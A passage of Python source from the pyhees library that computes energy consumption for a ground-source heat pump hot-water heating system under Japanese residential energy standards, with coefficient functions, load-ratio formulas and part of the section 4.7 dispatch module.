# Ksch0:過冷却度を計算する式の係数 (-) (6b)
K_sc_h_0 = get_K_sc_h_0()
# Ksch1:過冷却度を計算する式の係数 (-) (6b)
K_sc_h_1 = get_K_sc_h_1()
# Ksch2:過冷却度を計算する式の係数 (-) (6b)
K_sc_h_2 = get_K_sc_h_2()
# 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) (6a)
Theta_ref_SC_d_t = np.clip(K_sc_h_0 + K_sc_h_1 * Theta_SW_d_t + K_sc_h_2 * qr_out_H_hs_d_t, 0, None)
return Theta_ref_SC_d_t
def get_K_sc_h_0():
"""Ksch0:過冷却度を計算する式の係数(-) (6b)
Args:
Returns:
float: Ksch0:過冷却度を計算する式の係数(-) (6b)
"""
return -4.02655782981397
def get_K_sc_h_1():
"""Ksch1:過冷却度を計算する式の係数 (-) (6b)
Args:
Returns:
float: Ksch1:過冷却度を計算する式の係数
"""
return 0.0894330494418674
def get_K_sc_h_2():
"""Ksch2:過冷却度を計算する式の係数 (-) (6b)
Args:
Returns:
float: Ksch2:過冷却度を計算する式の係数
"""
return 14.3457831669162
def calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d):
"""日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)
Returns:
ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)
"""
# Kshh0:過熱度を計算する式の係数 (-) (7b)
K_sh_h_0 = get_K_sh_h_0()
# Kshh1:過熱度を計算する式の係数 (-) (7b)
K_sh_h_1 = get_K_sh_h_1()
# Kshh2:過熱度を計算する式の係数 (-) (7b)
K_sh_h_2 = get_K_sh_h_2()
# 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) (7a)
    Theta_ref_SH_d_t = np.clip(K_sh_h_0 + K_sh_h_1 * qr_out_H_hs_d_t + K_sh_h_2 * np.repeat(Theta_gsRW_d_ave_d, 24), 0, None)
    return Theta_ref_SH_d_t
def get_K_sh_h_0():
"""Kshh0:過熱度を計算する式の係数(-) (7b)
Args:
Returns:
float: Kshh0:過熱度を計算する式の係数
"""
return 0.819643791668597
def get_K_sh_h_1():
"""Kshh1:過熱度を計算する式の係数 (-) (7b)
Args:
Returns:
float: Kshh1:過熱度を計算する式の係数 (-)
"""
return 2.99282570323758
def get_K_sh_h_2():
"""Kshh2:過熱度を計算する式の係数 (-) (7b)
Args:
Returns:
Kshh2:過熱度を計算する式の係数 (-)
"""
return -0.0762659183765636
# ============================================================================
# N.5 ポンプの消費電力量
# ============================================================================
def get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t):
"""日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8)
Args:
E_pump_SW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h)
E_pump_gsRW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりのポンプの消費電力量(kWh/h)
"""
# 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8)
E_pump_hs_d_t = E_pump_SW_d_t + E_pump_gsRW_d_t
return E_pump_hs_d_t
def calc_E_pump_SW_d_t(qr_out_H_hs_d_t):
"""日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h)
"""
# apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b)
a_pump_SW = get_a_pump_SW()
# bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b)
b_pump_SW = get_b_pump_SW()
# 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a)
E_pump_SW_d_t = a_pump_SW * qr_out_H_hs_d_t + b_pump_SW * (qr_out_H_hs_d_t ** 2)
return E_pump_SW_d_t
def get_a_pump_SW():
"""apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b)
Args:
Returns:
float: apump,SW:送水ポンプの消費電力量を計算する式の係数 (-)
"""
return 0.041972403
def get_b_pump_SW():
"""bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b)
Args:
Returns:
float: bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-)
"""
return 0.104478967
def calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t):
"""日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h)
"""
# apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b)
a_pump_gsRW = get_a_pump_gsRW()
# bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b)
b_pump_gsRW = get_b_pump_gsRW()
# 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a)
E_pump_gsRW_d_t = a_pump_gsRW * qr_out_H_hs_d_t + b_pump_gsRW * (qr_out_H_hs_d_t ** 2)
return E_pump_gsRW_d_t
def get_a_pump_gsRW():
"""apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b)
Args:
Returns:
float: apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-)
"""
return 0.062196275
def get_b_pump_gsRW():
"""bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b)
Args:
Returns:
bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-)
"""
return 0.071756474
# ============================================================================
# N.6 補機の消費電力量
# ============================================================================
def calc_E_aux_hs_d_t(qr_out_H_hs_d_t):
"""日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a)
Args:
qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h)
"""
# kauxh0:補機の消費電力量を計算する式の係数 (-) (11b)
kauxh0 = get_kauxh0()
# kauxh1:補機の消費電力量を計算する式の係数 (-) (11b)
kauxh1 = get_kauxh1()
# 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (11a)
E_aux_hs_d_t = kauxh1 * qr_out_H_hs_d_t + kauxh0
return E_aux_hs_d_t
def get_kauxh0():
"""kauxh0:補機の消費電力量を計算する式の係数 (-) (11b)
Args:
Returns:
float: kauxh0:補機の消費電力量を計算する式の係数 (-)
"""
return 0.0433205551083371
def get_kauxh1():
"""kauxh1:補機の消費電力量を計算する式の係数 (-) (11b)
Args:
Returns:
float: kauxh1:補機の消費電力量を計算する式の係数 (-)
"""
return 0.0173758330059922
# ============================================================================
# N.7 温水暖房用熱源機の最大暖房能力に対する平均負荷率
# ============================================================================
def get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA):
"""日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12)
Args:
        q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)
        q_max_H_hs_JRA(float): 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)
Returns:
ndarray: 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-)
"""
# 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12)
qr_out_H_hs_d_t = (q_out_H_hs_d_t * 10 ** 3) / q_max_H_hs_JRA
return qr_out_H_hs_d_t
# ============================================================================
# N.8 温水暖房用熱源機の平均暖房出力
# ============================================================================
def get_q_out_H_hs_d_t(Q_out_H_hs_d_t):
"""日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13)
Args:
Q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)
Returns:
ndarray: 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)
"""
# 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(13)
q_out_H_hs_d_t = Q_out_H_hs_d_t / 3600 * 10 ** 3
return q_out_H_hs_d_t
def get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t):
"""日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14)
Args:
Q_dmd_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の温水熱需要(MJ/h)
Q_max_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)
"""
    # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14)
return np.min([Q_dmd_H_hs_d_t, Q_max_H_hs_d_t], axis=0)
def calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType):
"""日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) (15)
Args:
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃)
Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃)
Theta_ex_a_Ave(float): 年平均外気温度 (℃)
        q_max_hs(float): 熱源機の最大暖房能力 (W)
L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)
"""
# ---------- 地中熱交換器からの戻り熱源水の日平均温度 ----------
# 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i)
# 1日当たりの暖房負荷の年間最大値(MJ/d)(20b)
L_max_H = get_L_max_H(L_H_x_t_i)
# 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
R_L_max = get_R_L_max(L_max_H, L_max_C)
# 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType)
# 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18)
Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType)
# 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17)
Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave,
Delta_Theta_gsRW_H)
# ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) ----------
q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs)
# ---------- 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) ----------
Q_max_H_hs_d_t = (-0.005635139785329 * Theta_SW_d_t
+ 0.0258983299329793 * np.clip(np.repeat(Theta_gsRW_d_ave_d, 24), 0, 20) + 0.836930642418471) * q_max_H_hs_JRA * 3600 * 10 ** (-6)
return Q_max_H_hs_d_t
# ============================================================================
# N.9 温水暖房用熱源機内の平均放熱損失
# ============================================================================
def get_q_loss_H_hs_d_t():
"""日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW)
Args:
Returns:
float: 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW)
"""
return 0
# ============================================================================
# N.10 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力
# ============================================================================
def calc_q_max_H_hs_JRA(q_max_hs):
"""地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16)
Args:
        q_max_hs(float): 熱源機の最大暖房能力 (W)
Returns:
        float: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)
"""
# 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-)
f_crated = get_f_crated()
# 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)(16)
q_max_H_hs_JRA = q_max_hs * f_crated
return q_max_H_hs_JRA
def calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""温水暖房用熱源機の定格能力
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 温水暖房用熱源機の定格能力
"""
# 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい
return appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
def get_f_crated():
"""地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-)
Args:
Returns:
float: 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-)
"""
return 1.35
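# --- 参考: 式(16)の例(解説用に追記。q_max_hs = 8000 W は仮定値) ---
#   >>> calc_q_max_H_hs_JRA(8000)
#   8000 * 1.35 = 10800 [W]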
# ============================================================================
# N.11 地中熱交換器からの戻り熱源水の日平均温度
# ============================================================================
def get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H):
"""日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17)
Args:
K_gsRW_H(float): K_gsRW_H: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)
Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃)
Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃)
Theta_ex_a_Ave(float): 年平均外気温度 (℃)
Delta_Theta_gsRW_H(float): 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)
Returns:
ndarray: 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)
"""
# 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17)
Theta_gsRW_d_ave_d = K_gsRW_H * (Theta_ex_d_Ave_d - Theta_ex_H_Ave) + Theta_ex_a_Ave + Delta_Theta_gsRW_H
return Theta_gsRW_d_ave_d
def calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType):
"""暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18)
Args:
R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)
HeatExchangerType(str): 地中熱交換器タイプ
Returns:
float: 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)
"""
# 熱交換器タイプに応じた係数取得
a_gsRW_H = get_a_gsRW_H(HeatExchangerType)
b_gsRW_H = get_b_gsRW_H(HeatExchangerType)
# 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18)
Delta_Theta_gsRW_H = a_gsRW_H * R_L_max + b_gsRW_H
return Delta_Theta_gsRW_H
def calc_K_gsRW_H(R_L_max, HeatExchangerType):
"""地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
Args:
R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
float: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
"""
# 熱交換器タイプに応じた係数取得
c_gsRW_H = get_c_gsRW_H(HeatExchangerType)
d_gsRW_H = get_d_gsRW_H(HeatExchangerType)
# 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19)
K_gsRW_H = c_gsRW_H * R_L_max + d_gsRW_H
return K_gsRW_H
def get_a_gsRW_H(HeatExchangerType):
"""熱交換器タイプに応じた係数a_gsRW_Hの取得
Args:
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
float: 熱交換器タイプに応じた係数a_gsRW_Hの取得
"""
if HeatExchangerType == '1':
return get_table_n_3()[0][0]
elif HeatExchangerType == '2':
return get_table_n_3()[1][0]
elif HeatExchangerType == '3':
return get_table_n_3()[2][0]
elif HeatExchangerType == '4':
return get_table_n_3()[3][0]
elif HeatExchangerType == '5':
return get_table_n_3()[4][0]
else:
raise ValueError(HeatExchangerType)
def get_b_gsRW_H(HeatExchangerType):
"""熱交換器タイプに応じた係数b_gsRW_Hの取得
Args:
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
float: 熱交換器タイプに応じた係数b_gsRW_Hの取得
"""
if HeatExchangerType == '1':
return get_table_n_3()[0][1]
elif HeatExchangerType == '2':
return get_table_n_3()[1][1]
elif HeatExchangerType == '3':
return get_table_n_3()[2][1]
elif HeatExchangerType == '4':
return get_table_n_3()[3][1]
elif HeatExchangerType == '5':
return get_table_n_3()[4][1]
else:
raise ValueError(HeatExchangerType)
def get_c_gsRW_H(HeatExchangerType):
"""熱交換器タイプに応じた係数a_gsRW_Hの取得
Args:
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
        float: 熱交換器タイプに応じた係数c_gsRW_Hの取得
"""
if HeatExchangerType == '1':
return get_table_n_3()[0][2]
elif HeatExchangerType == '2':
return get_table_n_3()[1][2]
elif HeatExchangerType == '3':
return get_table_n_3()[2][2]
elif HeatExchangerType == '4':
return get_table_n_3()[3][2]
elif HeatExchangerType == '5':
return get_table_n_3()[4][2]
else:
raise ValueError(HeatExchangerType)
def get_d_gsRW_H(HeatExchangerType):
"""熱交換器タイプに応じた係数b_gsRW_Hの取得
Args:
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
        float: 熱交換器タイプに応じた係数d_gsRW_Hの取得
"""
if HeatExchangerType == '1':
return get_table_n_3()[0][3]
elif HeatExchangerType == '2':
return get_table_n_3()[1][3]
elif HeatExchangerType == '3':
return get_table_n_3()[2][3]
elif HeatExchangerType == '4':
return get_table_n_3()[3][3]
elif HeatExchangerType == '5':
return get_table_n_3()[4][3]
else:
raise ValueError(HeatExchangerType)
def get_table_n_3():
"""表N.3 係数
Args:
Returns:
list: 表N.3 係数
"""
table_n_3 = [
(3.1672, -0.4273, -0.0444, 0.0442),
(5.9793, -1.0687, -0.1613, 0.1047),
(8.3652, -1.5946, -0.2486, 0.1546),
(9.9065, -2.1827, -0.3454, 0.2072),
(10.2898, -2.8727, -0.3270, 0.2700)
]
return table_n_3
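# --- 参考: 表N.3 の引き方(解説用に追記。行が熱交換器タイプ '1'~'5'、列が係数 a, b, c, d に対応) ---
#   >>> get_a_gsRW_H('1'), get_b_gsRW_H('1'), get_c_gsRW_H('1'), get_d_gsRW_H('1')
#   (3.1672, -0.4273, -0.0444, 0.0442)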
def get_R_L_max(L_max_H, L_max_C):
"""1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
Args:
L_max_H(float): 1日当たりの暖房負荷の年間最大値(MJ/d)
L_max_C(float): 1日当たりの冷房全熱負荷の年間最大値(MJ/d)
Returns:
float: 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
"""
# 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
R_L_max = (L_max_C - L_max_H) / (L_max_C + L_max_H)
return R_L_max
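# --- 参考: 式(20a)・(18)・(19)の検算例(解説用に追記。負荷と熱交換器タイプは仮定値) ---
#   L_max_H = 300 MJ/d, L_max_C = 200 MJ/d のとき R_L_max = (200 - 300) / (200 + 300) = -0.2
#   熱交換器タイプ '1' なら Delta_Theta_gsRW_H = 3.1672 * (-0.2) - 0.4273 ≒ -1.06 ℃ (式18)
#   K_gsRW_H = -0.0444 * (-0.2) + 0.0442 ≒ 0.053 (式19)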
def get_L_max_H(L_H_x_t_i):
"""1日当たりの暖房負荷の年間最大値(MJ/d)(20b)
Args:
L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷
Returns:
float: 1日当たりの暖房負荷の年間最大値(MJ/d)
"""
# L_H_x_t_iは暖冷房区画毎に365日×24時間分の負荷を持った2次元配列
# 暖冷房区画軸合算(暖冷房区画の次元をなくす)
L_H_x_t = np.sum(L_H_x_t_i, axis=0)
# 1次元配列を2次元配列に形状変換する
L_H_x_t = np.reshape(L_H_x_t, (365, 24))
# 時間軸合算
L_H_x = np.sum(L_H_x_t, axis=1)
# 1日当たりの暖房負荷の年間最大値(MJ/d)(20b)
L_max_H = np.max(L_H_x)
return L_max_H
def get_L_max_C(L_CS_x_t_i, L_CL_x_t_i):
"""1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
Args:
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
Returns:
float: 1日当たりの冷房全熱負荷の年間最大値(MJ/d)
"""
# 暖冷房区画軸合算(暖冷房区画の次元をなくす)
L_CS_x_t = np.sum(L_CS_x_t_i, axis=0)
L_CL_x_t = np.sum(L_CL_x_t_i, axis=0)
# L_CS_x_tとL_CL_x_tの要素同士を足す
L_C_x_t = L_CS_x_t + L_CL_x_t
# 1次元配列を2次元配列に形状変換する
L_C_x_t = np.reshape(L_C_x_t, (365, 24))
# 時間軸合算
L_C_x = np.sum(L_C_x_t, axis=1)
# 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
L_max_C = np.max(L_C_x)
return L_max_C
```
#### File: src/pyhees/section4_7.py
```python
import numpy as np
import pyhees.section3_1 as ld
import pyhees.section4_7_a as hs_oil
import pyhees.section4_7_b as hs_gas
import pyhees.section4_7_c as hs_eheater
import pyhees.section4_7_d as hs_ehpump
import pyhees.section4_7_e as hs_gas_hybrid
import pyhees.section4_7_f as hs_hybrid_gas
import pyhees.section4_7_g as hs_whybrid
import pyhees.section4_7_n as hs_ghpump
import pyhees.section4_7_j as rad_panel
import pyhees.section4_7_k as rad_fanc
import pyhees.section4_7_l as rad_floor
import pyhees.section4_7_i as pipe
from pyhees.section4_7_common import get_Q_out_H_hs_d_t
from pyhees.section11_1 import \
load_outdoor, \
get_Theta_ex, \
get_X_ex, \
calc_h_ex, \
get_Theta_ex_a_Ave, \
get_Theta_ex_d_Ave_d, \
get_Theta_ex_H_Ave
# ============================================================================
# 5. 最大暖房出力
# ============================================================================
def calc_Q_max_H_d_t_i(radiator, A_HCZ, Theta_SW, region, mode, R_type):
"""最大暖房出力
Args:
radiator(dict): 放熱器仕様
A_HCZ(float): 暖冷房区画の床面積
Theta_SW(float): 往き温水温度
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
ndarray: 最大暖房出力
"""
return calc_Q_max_H_rad_d_t_i(radiator, A_HCZ, Theta_SW, region, mode, R_type)
# ============================================================================
# 6. エネルギー消費量
# ============================================================================
# ============================================================================
# 6.1 消費電力量
# ============================================================================
def calc_E_E_H_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, L_CS_x_t, L_CL_x_t, CG=None):
"""消費電力量 (1)
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
L_CS_x_t(ndarray): 暖冷房区画の冷房顕熱負荷
L_CL_x_t(ndarray): 暖冷房区画の冷房潜熱負荷
CG(dict, optional): コージェネレーション設備の仕様 (Default value = None)
        A_A(float): 床面積の合計 (m2)
Returns:
ndarray: 消費電力量 (1)
"""
rad_types = get_rad_type_list()
rad_list = get_rad_list(H_MR, H_OR)
E_E_hs_d_t = calc_E_E_hs_d_t(H_HS, H_MR, H_OR, region, A_A, A_MR, A_OR, mode_MR, mode_OR, L_T_H_rad, CG, L_CS_x_t, L_CL_x_t)
E_E_rad_d_t = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
if rad_list[i - 1]['type'] in rad_types:
radiator = rad_list[i - 1]
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
Theta_SW_hs_op = get_Theta_SW_hs_op(H_HS['type'], CG)
p_hs_d_t = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs_d_t)
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(radiator, A_HCZ, Theta_SW_d_t, region, mode, R_type)
Q_T_H_rad_d_t_i = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
E_E_rad_d_t_i = calc_E_E_rad_d_t_i(i, radiator, Q_T_H_rad_d_t_i, Theta_SW_d_t, A_A, A_MR, A_OR, region, mode,
R_type)
E_E_rad_d_t[i - 1, :] = E_E_rad_d_t_i
print('{} E_E_rad_d_t_{} = {} [KWh] (L_T_H_rad_d_t_{} = {} [MJ])'.format(radiator['type'], i,
np.sum(E_E_rad_d_t_i), i,
np.sum(L_T_H_rad[i - 1])))
E_E_H_d_t = E_E_hs_d_t + np.sum(E_E_rad_d_t, axis=0)
return E_E_H_d_t
# ============================================================================
# 6.2 灯油消費量
# ============================================================================
def calc_E_K_H_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""灯油消費量 (2)
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: 灯油消費量 (2)
"""
return calc_E_K_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
# ============================================================================
# 6.3 ガス消費量
# ============================================================================
def calc_E_G_H_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""ガス消費量 (3)
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: ガス消費量 (3)
"""
return calc_E_G_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
# ============================================================================
# 6.4 その他の燃料による一次エネルギー消費量
# ============================================================================
def calc_E_M_H_d_t(H_HS):
"""その他の燃料による一次エネルギー消費量 (4)
Args:
H_HS(dict): 温水暖房機の仕様
Returns:
ndarray: その他の燃料による一次エネルギー消費量 (4)
"""
return get_E_M_hs_d_t(H_HS)
# ============================================================================
# 7. 温水暖房熱源機のエネルギー消費量
# ============================================================================
def calc_Q_UT_hs_d_t(H_HS, H_MR, H_OR, region, A_A, A_MR, A_OR, mode_MR, mode_OR, L_T_H_rad, CG, L_CS_x_t_i, L_CL_x_t_i):
"""温水暖房用熱源機の未処理
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
